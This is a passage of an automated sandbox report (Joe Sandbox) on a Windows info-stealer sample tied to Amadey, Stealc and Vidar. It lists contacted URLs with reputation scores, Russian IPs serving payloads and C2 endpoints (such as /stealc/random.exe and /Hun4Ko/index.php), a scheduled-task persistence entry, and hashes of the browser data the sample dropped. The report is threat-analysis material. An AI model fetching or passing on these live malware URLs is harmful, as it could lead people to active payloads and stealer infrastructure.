                        http://www.mozilla.com/en-US/blocklist/37664d9843.exe, 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://mozilla.org0/mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/37664d9843.exe, 00000004.00000002.1962741464.0000000001F1A000.00000004.00000020.00020000.00000000.sdmptrue
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php3693405117-2476756634-1002explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dllzW37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dll.s/37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.81/cost/go.exeData586ef238b2.exe, 0000000F.00000002.3328030922.000000000034A000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.81/cost/go.exe0037664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.81/mine/amadka.exea37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpGRJexplorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpkR&explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://upx.sf.netAmcache.hve.10.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201637664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000003.1839531742.000000002385D000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000003.3202674791.0000000022D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/softokn3.dllq586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.ecosia.org/newtab/586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEBGIDGCAFCBKECAAKJJKJEHDGC.15.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpaR(explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.ep586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ac.ecosia.org/autocomplete?q=37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.81/stealc/random.exeHexplorti.exe, 00000003.00000002.4096195243.000000000149F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • URL Reputation: safe
                        unknown
                        http://pki-ocsp.symauth.com037664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dllvs37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.3037664d9843.exe, 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.000000000172E000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php3R~explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.orgEBGIDGCAFCBKECAAKJJKJEHDGC.15.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe.phpefoxx586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        85.28.47.30
                        unknownRussian Federation
                        31643GES-ASRUtrue
                        77.91.77.81
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                        77.91.77.82
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1467933
                        Start date and time:2024-07-05 04:22:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 40s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:21
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:So7a8eQerR.exe
                        renamed because original name is a hash value
                        Original Sample Name:1608caccc377a28575b839e3eec49314.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@29/45@0/3
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target GIEHIDHJDB.exe, PID 7624 because there are no executed function
                        • Execution Graph export aborted for target So7a8eQerR.exe, PID 7432 because it is empty
                        • Execution Graph export aborted for target explorti.exe, PID 7620 because there are no executed function
                        • Execution Graph export aborted for target explorti.exe, PID 7736 because there are no executed function
                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing network information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        03:22:54Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        22:23:02API Interceptor12386561x Sleep call for process: explorti.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        85.28.47.30file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.30/920475a59bac849d.php
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.30/920475a59bac849d.php
                        77.91.77.81file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/well/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/well/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/well/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/well/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                        • 77.91.77.180
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro StealerBrowse
                        • 77.91.77.180
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                        • 77.91.77.81
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                        • 77.91.77.180
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro StealerBrowse
                        • 77.91.77.180
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                        • 77.91.77.81
                        GES-ASRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.30
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.30
                        file.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousXenoRATBrowse
                        • 85.28.47.8
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                        • 85.28.47.7
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                            C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                file.exeGet hashmaliciousVidarBrowse
                                                  file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):106496
                                                                Entropy (8bit):1.1358696453229276
                                                                Encrypted:false
                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):9571
                                                                Entropy (8bit):5.536643647658967
                                                                Encrypted:false
                                                                SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):0.8180424350137764
                                                                Encrypted:false
                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):5242880
                                                                Entropy (8bit):0.037963276276857943
                                                                Encrypted:false
                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.8553638852307782
                                                                Encrypted:false
                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):5242880
                                                                Entropy (8bit):0.037963276276857943
                                                                Encrypted:false
                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):9571
                                                                Entropy (8bit):5.536643647658967
                                                                Encrypted:false
                                                                SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                Malicious:false
                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                Process:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                Category:dropped
                                                                Size (bytes):28672
                                                                Entropy (8bit):2.5793180405395284
                                                                Encrypted:false
                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
